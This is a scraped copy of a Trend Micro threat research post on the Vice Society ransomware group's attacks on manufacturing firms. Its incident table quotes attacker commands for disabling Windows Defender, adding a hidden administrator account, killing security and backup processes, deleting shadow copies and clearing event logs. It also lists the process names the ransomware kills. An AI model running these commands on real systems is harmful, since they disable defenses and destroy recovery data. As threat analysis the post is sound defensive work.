Vice Society Ransomware Group Targets Manufacturing Companies<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/a\/vice-society-ransomware-group-targets-manufacturing-companies.html\"> \n<meta property=\"og:title\" content=\"Vice Society Ransomware Group Targets Manufacturing Companies\"> \n<meta property=\"og:description\" content=\"In this blog entry, we\u2019d like to highlight our findings on Vice Society, which includes an end-to-end infection diagram that we were able to create using Trend Micro internal telemetry.\"> \n<meta property=\"og:site_name\" content=\"Trend Micro\"> \n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/vice-society-641.jpg\"> \n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"> \n<meta name=\"twitter:site\" content=\"@TrendMicro\"> \n<meta name=\"twitter:title\" content=\"Vice Society Ransomware Group Targets Manufacturing Companies\"> \n<meta name=\"twitter:description\" content=\"In this blog entry, we\u2019d like to highlight our findings on Vice Society, which includes an end-to-end infection diagram that we were able to create using Trend Micro internal telemetry.\"> \n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/vice-society-641.jpg\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.220265900108\">  <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <\/span> <\/a>  <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1094816314\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"10.753117206983\">\n<div class=\"article-details\" role=\"heading\" readability=\"41.057356608479\"> <\/span> <\/p>\nRansomware<\/p>\nIn this blog entry, we\u2019d like to highlight our findings on Vice Society, which includes an end-to-end infection diagram that we were able to create using Trend Micro internal telemetry.<\/p>\nBy: Ieriz Nicolle Gonzalez, Paul Pajares, Arianne Dela Cruz, Warren Sto.Tomas <time class=\"article-details__date\">January 24, 2023<\/time> Read time: <\/span><\/span> (<\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"39.602765556254\">\n<div readability=\"29.70207416719\">\nThe Vice Society <a href=\"https:\/\/www.trendmicro.com\/vinfo\/ph\/security\/definition\/ransomware\">ransomware<\/a> group <a href=\"https:\/\/www.scmagazine.com\/brief\/ransomware\/alleged-vice-society-ransomware-attack-against-san-francisco-bart-probed\">made headlines<\/a> in <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/vice-society-ransomware-gang-switches-to-new-custom-encryptor\/\">late 2022<\/a> and early 2023 during a spate of attacks against several targets, such as the one that affected the rapid transit system in San Francisco. Most reports have the threat actor focusing its efforts on the <a href=\"https:\/\/www.techtarget.com\/searchsecurity\/news\/252528118\/Vice-Society-ransomware-a-persistent-threat-to-education-sector\">education<\/a> and the <a href=\"https:\/\/blog.sygnia.co\/ransomware-group-that-the-health-and-education-sectors-should-look-out-for\">healthcare<\/a> industries. However, through Trend Micro\u2019s telemetry data, we have evidence that the group is also targeting the manufacturing sector, which means that they have capability and desire to penetrate different industries \u2014 most likely accomplished via the purchasing of compromised credentials from underground channels. We have detected the presence of Vice Society in Brazil (primarily affecting the country\u2019s manufacturing industry), Argentina, Switzerland, and Israel. <\/p>\nVice Society, which was initially reported to be exploiting the <a href=\"https:\/\/success.trendmicro.com\/dcx\/s\/solution\/000286888?language=en_US&sfdcIFrameOrigin=null\">PrintNightmare vulnerability<\/a> in their routines, have previously <a href=\"https:\/\/www.cisa.gov\/uscert\/ncas\/alerts\/aa22-249a\">deployed ransomware variants<\/a> such as Hello Kitty\/Five Hands and Zeppelin (the group\u2019s email has been in their ransom notes). More recently, Vice Society has been able to develop its own <a href=\"https:\/\/thehackernews.com\/2022\/12\/vice-society-ransomware-attackers-adopt.html\">custom ransomware builder<\/a> and adopt more robust encryption methods. This, and any further enhancements, could mean that the group is preparing for their own ransomware-as-a-service (RaaS) operation.<\/p>\nIn this blog entry, we\u2019d like to highlight our findings on Vice Society, which includes an end-to-end infection diagram that we were able to create using Trend Micro internal telemetry. Our detection name for this variant of Vice Society\u2019s ransomware is <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/Ransom.Win64.VICESOCIETY.A\/\">Ransom.Win64.VICESOCIETY.A<\/a> .<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"138fcc\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-1.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-1.jpg\" alt=\"Figure 1. Vice Society\u2019s evolution throughout 2021 to late 2022\"> <\/a><figcaption>Figure 1. Vice Society\u2019s evolution throughout 2021 to late 2022<\/figcaption><\/figure>\n<\/p><\/div>\n<div readability=\"5.8908238446082\">\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"0e2674\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-2.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-2.jpg\" alt=\"Figure 2. Trend Micro \u2122 Smart Protection Network \u2122 (SPN) detections for Vice Society from November 2022 to January 2023 (unique endpoints)\"> <\/a><figcaption>Figure 2. Trend Micro \u2122 Smart Protection Network \u2122 (SPN) detections for Vice Society from November 2022 to January 2023 (unique endpoints)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"c96472\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-3.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-3.jpg\" alt=\"Figure 3. Distribution of affected industries based on the Vice Society leak site\"> <\/a><figcaption>Figure 3. Distribution of affected industries based on the Vice Society leak site<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\nBased on our internal telemetry, we were able to create infection diagram for a Vice Society ransomware attack (illustrated in Figure 4). The arrival vector likely involves the exploitation of a public-facing website or abuse of compromised remote desktop protocol (RDP) credentials. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"929340\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-4.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-4.jpg\" alt=\"Figure 4. The infection chain of a Vice Society attack\"> <\/a><figcaption>Figure 4. The infection chain of a Vice Society attack<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\nThe following table shows what we were able to observe from a Vice Society attack. Note that all endpoints indicated belong to one Pointer to the GUID.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\" height=\"5%\">\n<tbody readability=\"27.5\">\n<tr>\n<td>\nDate<\/b><\/p>\n<\/td>\n<td width=\"463\" valign=\"top\">\nDescription<\/b><\/p>\n<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td width=\"89\" valign=\"top\">\nOctober 28, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"7\">\nPossible entry point using Cobalt Strike and the Rubeus hacktool<\/p>\nCobalt Strike connects to 57thandnormal[.]com<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"5\">\nDeployed Zeppelin ransomware<\/p>\nPath: C:\\mnt\\smile.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4.5\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"6\">\nCopied files<\/p>\nkape.exe –tsource C –target RecycleBin –tdest output –zip RecycleBin_{ComputerName} <\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"5\">\nDeployed Mimikatz<\/p>\nPath: C:\\ProgramData\\toolkiit\\{redacted}\\output\\C\\ $Recycle.Bin\\{redacted}\\$RY0DNVE.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"5.5\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"8\">\nExecuted a PowerShell script (w1.ps1)<\/p>\nCommand: \/c powershell.exe -ExecutionPolicy Bypass -file \\\\{ComputerName}\\s$\\w1.ps1 -ExecutionPolicy Bypass -file \\\\{ComputerName}\\s$\\w1.ps1<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"8.5\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"10\">\nDisabled antivirus (AV) programs such as Trend Micro Apex One and Windows Defender<\/p>\n\/i \\\\{ComputerName}\\netlogon\\ApexOneCloud\\agent_cloud_x64.msi \/quiet add “HKLM\\Software\\Policies\\Microsoft\\Windows Defender” \/v DisableAntiVirus \/t REG_DWORD \/d 1 \/f add “HKLM\\Software\\Policies\\Microsoft\\Windows Defender” \/v DisableAntiSpyware \/t REG_DWORD \/d 1 \/f add “HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine” \/v MpEnablePus \/t REG_DWORD \/d 0 \/f<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"7\">\nDeployed Vice Society ransomware<\/p>\nPath: C:\\ProgramData\\test.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"10.5\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"12\">\nCreated Administrator account on each endpoint, add to Administrators and Remote Desktop Users localgroup<\/p>\nuser Administrator {password} \/add user Administrator {password} \/add localgroup Administrators Administrator \/ADD localgroup “Remote Desktop Users” Administrator \/ADD add “HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist” \/v Administrator \/t REG_DWORD \/d 0 \/f<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"8.5\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"10\">\nTerminated processes such as AV and security software.<\/p>\nprocess where \u201cname like \u2018%Agent%\u2019\u201d delete process where \u201cname like \u2018%Malware%\u2019\u201d delete process where \u201cname like \u2018%Endpoint%\u2019\u201d delete process where \u201cname like \u2018%sql%\u2019\u201d delete process where \u201cname like \u2018%Veeam%\u2019\u201d delete process where \u201cname like \u2018%Core.Service%\u2019\u201d delete<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"5\">\nExfiltrated important files<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"5.5\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"8\">\nMultiple deployments of Vice Society ransomware was dropped in the %Temp% directory on different endpoints<\/p>\nPath: C:\\windows\\temp\\svchost.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"5\">\nObserved file infector Neshta<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"7\">\nPerformed ransomware routine via $mytemp$\\svchost.exe<\/p>\n“\/c vssadmin.exe Delete Shadows \/All \/Quiet<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"9.5\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"10\">\nVice Society ransomware routine is performed (files are encrypted, ransom note with email contacts is dropped and files are appended with the extension .v1cesO0ciety)<\/p>\nRansom note: AllYFilesAE! Extension: .v1cesO0ciety Contact email of ransom operators: 876505846904@onionmail[.]org 316186524106@onionmail[.]org v-society.official@onionmail[.]org<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"8.5\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"10\">\nEvent viewer logs and remote session traces such as RDP and terminal services were cleared<\/p>\nreg delete “”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default”” \/va \/f reg delete “”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers”” \/f reg add “”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers”” cd %userprofile%\\documents\\ attrib Default.rdp -s -h del Default.rdp for \/F “”tokens=*”” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl “”%1″””<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td width=\"89\" valign=\"top\">\nNovember 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"7\">\nDeleted itself from the system<\/p>\n“%System%\\cmd.exe” \/c del {Malware File Path}\\{Malware File Name} -> nul -> to delete itself<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<h5>Table 1. Date and description of the routines involved in a Vice Society attack<\/h5>\n<\/p><\/div>\n<div class=\"richText\" readability=\"43.700934579439\">\n<div readability=\"34.576563623293\">\nThe weaponized tool used by Vice Society is <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/g\/tracking_cobalt_strike_a_vision_one_investigation.html\">Cobalt Strike<\/a>, which allows the group to remotely access and control the infected endpoint. The threat actor also used the Rubeus C# toolset for raw Kerberos interaction and abuse (although this is not a new technique, since it has been previously used by Ryuk, Conti, and <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2022\/06\/13\/the-many-lives-of-blackcat-ransomware\/\">BlackCat<\/a>).<\/p>\nTo laterally move within the target network, Mimikatz was used to dump passwords and the Kape tool for copying files. We also observed the presence of the Zeppelin ransomware from another endpoint that also uses Kape for data exfiltration. Vice Society was known to have deployed Zeppelin before, however, perhaps due to its weaker encryption, the threat actor decided to go with custom-built ransomware.<\/p>\nVice Society will then execute a PowerShell script to create an administrator account that allows for the remote access of other endpoints and to terminate several processes such as running security software before dropping the custom-built ransomware. In most of the ViceSociety detections we also observed the presence of Neshta file infector (which can be cleaned by Trend Micro), although it is not clear how this occurred.<\/p>\nVirtual servers, such as Microsoft Hyper-V, are also affected in this attack. We also found the attacker removing traces of RDP sessions such as wevtutil.exe, a technique that was <a href=\"https:\/\/twitter.com\/malwrhunterteam\/status\/1314960487507951617?lang=en\">previously used by Clop ransomware<\/a> and KillDisk. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"7b8b71\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-5a1.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-5a1.jpg\" alt=\"Figure 5. The ransomware note (top) and desktop ransom message (bottom) displayed on the victim\u2019s machine\"> <\/a> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"f0eb51\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-5b.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-5b.jpg\" alt=\"Figure 5. The ransomware note (top) and desktop ransom message (bottom) displayed on the victim\u2019s machine\"> <\/a><figcaption>Figure 5. The ransomware note (top) and desktop ransom message (bottom) displayed on the victim\u2019s machine<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"2a3816\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-6.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-6.jpg\" alt=\"Figure 6. The primary TOR website and mirror links\"> <\/a><figcaption>Figure 6. The primary TOR website and mirror links<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"2eb69e\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-7.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-7.jpg\" alt=\"Figure 7. Vice Society\u2019s file storage site\"> <\/a><figcaption>Figure 7. Vice Society\u2019s file storage site<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\nOnce the administrator account is added and established, Vice Society can terminate several processes, including security-related ones, to enable the successful deployment and execution of its ransomware on the affected endpoints. <\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<ul>\n<li>%Agent%<\/b><\/span><\/li>\n<li>%Malware%<\/b><\/span><\/li>\n<li>%Endpoint%<\/b><\/span><\/li>\n<li>%sql%<\/b><\/span><\/li>\n<li>%Veeam%<\/b><\/span><\/li>\n<li>%Core.Service%<\/b><\/span><\/li>\n<li>%Mongo%<\/b><\/span><\/li>\n<li>%Backup%<\/b><\/span><\/li>\n<li>%QuickBooks%<\/b><\/span><\/li>\n<li>%QBDB%<\/b><\/span><\/li>\n<li>%QBData%<\/b><\/span><\/li>\n<li>%QBCF%<\/b><\/span><\/li>\n<li>%Kaspersky%<\/b><\/span><\/li>\n<li>%server%<\/b><\/span><\/li>\n<li>%sage%<\/b><\/span><\/li>\n<li>%http%<\/b><\/span><\/li>\n<li>%apache%<\/b><\/span><\/li>\n<li>%segurda%<\/b><\/span><\/li>\n<li>%center%<\/b><\/span><\/li>\n<li>%silverlight%<\/b><\/span><\/li>\n<li>%exchange%<\/b><\/span><\/li>\n<li>%manage%<\/b><\/span><\/li>\n<li>%acronis%<\/b><\/span><\/li>\n<li>%autodesk%<\/b><\/span><\/li>\n<li>%database%<\/b><\/span><\/li>\n<li>%firefox%<\/b><\/span><\/li>\n<li>%chrome%<\/b><\/span><\/li>\n<li>%barracuda%<\/b><\/span><\/li>\n<li>%arcserve%<\/b><\/span><\/li>\n<li>%sprout%<\/b><\/span><\/li>\n<li>%anydesk%<\/b><\/span><\/li>\n<li>%protect%<\/b><\/span><\/li>\n<li>%secure%<\/b><\/span><\/li>\n<li>%adobe%<\/b><\/span><\/li>\n<li>%java%<\/b><\/span><\/li>\n<li>%logmein%<\/b><\/span><\/li>\n<li>%microsoft%<\/b><\/span><\/li>\n<li>%solarwinds%<\/b><\/span><\/li>\n<li>%engine%<\/b><\/span><\/li>\n<li>%web%<\/b><\/span><\/li>\n<li>%vnc%<\/b><\/span><\/li>\n<li>%teamviewer%<\/b><\/span><\/li>\n<li>%OCSInventory%<\/b><\/span><\/li>\n<li>%monitor%<\/b><\/span><\/li>\n<li>%security%<\/b><\/span><\/li>\n<li>%def%<\/b><\/span><\/li>\n<li>%dev%<\/b><\/span><\/li>\n<li>%office%<\/b><\/span><\/li>\n<li>%Framework%<\/b><\/span><\/li>\n<li>%AlwaysOn%<\/b><\/span><\/li>\n<li>%Agent%<\/b><\/span><\/li>\n<li>%Malware%<\/b><\/span><\/li>\n<li>%Endpoint%<\/b><\/span><\/li>\n<li>%sql%<\/b><\/span><\/li>\n<li>%Veeam%<\/b><\/span><\/li>\n<li>%acronis%<\/b><\/span><\/li>\n<li>%autodesk%<\/b><\/span><\/li>\n<li>%database%<\/b><\/span><\/li>\n<li>%adobe%<\/b><\/span><\/li>\n<li>%java%<\/b><\/span><\/li>\n<li>%logmein%<\/b><\/span><\/li>\n<li>%microsoft%<\/b><\/span><\/li>\n<li>%solarwinds%<\/b><\/span><\/li>\n<li>%engine%<\/b><\/span><\/li>\n<li>%QBDB%<\/b><\/span><\/li>\n<li>%QBData%<\/b><\/span><\/li>\n<li>%QBCF%<\/b><\/span><\/li>\n<li>%Kaspersky%<\/b><\/span><\/li>\n<li>%server%<\/b><\/span><\/li>\n<li>%sage%<\/b><\/span><\/li>\n<li>%http%<\/b><\/span><\/li>\n<li>%apache%<\/b><\/span><\/li>\n<li>%web%<\/b><\/span><\/li>\n<li>%vnc%<\/b><\/span><\/li>\n<li>%AlwaysOn%<\/b><\/span><\/li>\n<li>%Framework%<\/b><\/span><\/li>\n<li>%sprout%<\/b><\/span><\/li>\n<li>%firefox%<\/b><\/span><\/li>\n<li>%chrome%<\/b><\/span><\/li>\n<li>%barracuda%<\/b><\/span><\/li>\n<li>%arcserve%<\/b><\/span><\/li>\n<li>%exchange%<\/b><\/span><\/li>\n<li>%manage%<\/b><\/span><\/li>\n<li>%Core.Service%<\/b><\/span><\/li>\n<li>%Mongo%<\/b><\/span><\/li>\n<li>%Backup%<\/b><\/span><\/li>\n<li>%QuickBooks%<\/b><\/span><\/li>\n<li>%teamviewer%<\/b><\/span><\/li>\n<li>%OCSInventory%<\/b><\/span><\/li>\n<li>%monitor%<\/b><\/span><\/li>\n<li>%security%<\/b><\/span><\/li>\n<li>%def%<\/b><\/span><\/li>\n<li>%dev%<\/b><\/span><\/li>\n<li>%office%<\/b><\/span><\/li>\n<li>%anydesk%<\/b><\/span><\/li>\n<li>%protect%<\/b><\/span><\/li>\n<li>%secure%<\/b><\/span><\/li>\n<li>%segurda%<\/b><\/span><\/li>\n<li>%center%<\/b><\/span><\/li>\n<li> %silverlight%<\/b><\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"37.242857142857\">\n<div readability=\"22.628571428571\">\nVice Society seems to be constantly improving their capabilities, managing to build their own custom-built ransomware while also continuing to employ toolsets such as Cobalt Strike and malware such as Zeppelin and Hello Kitty\/FiveHands to enhance their routines. Furthermore, the use of the Kape tool can speed up the identification of important files from a computer. Given what we know of the group\u2019s technical knowledge and their willingness to target several different industries and regions, we can expect them to remain a significant player in the ransomware landscape and a threat that organizations must keep track of moving forward.<\/p>\nA multilayered approach can help organizations guard possible entry points into their system, such as endpoints, emails, web, and networks. The following security solutions can detect malicious components and suspicious behavior, which can help protect enterprises.<\/p>\n<ul>\n<li><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\">Trend Micro Vision One\u2122<\/a> provides multilayered protection and behavior detection, which helps block questionable behavior and tools early on before the ransomware can do irreversible damage to the system.<\/span><\/li>\n<li><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/hybrid-cloud\/cloud-one-workload-security.html\">Trend Micro Cloud One\u2122<\/a> Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning.<\/span><\/li>\n<li><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/email-and-collaboration\/email-inspector.html\">Trend Micro\u2122 Deep Discovery\u2122<\/a> Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.<\/span><\/li>\n<li><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/endpoint.html\">Trend Micro Apex One\u2122<\/a> offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints. <\/span><\/li>\n<\/ul>\nThe indicators of compromise for this blog entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/iocs-vice-society-ransomware-group-targets-manufacturing-companies-full.txt\">here<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\nTags<\/p>\n<\/section>\n <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n   <\/p>\n sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n   <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/a\/vice-society-ransomware-group-targets-manufacturing-companies.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"In this blog entry, we\u2019d like to highlight our findings on Vice Society, which includes an end-to-end infection diagram that we were able to create using Trend Micro internal telemetry. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":50245,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9539,9509],"class_list":["post-50244","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-ransomware","tag-trend-micro-research-research"],"yoast_head":"\n<title>Vice Society Ransomware Group Targets Manufacturing Companies 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Vice Society Ransomware Group Targets Manufacturing Companies 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-01-24T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/vice-society-641.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written 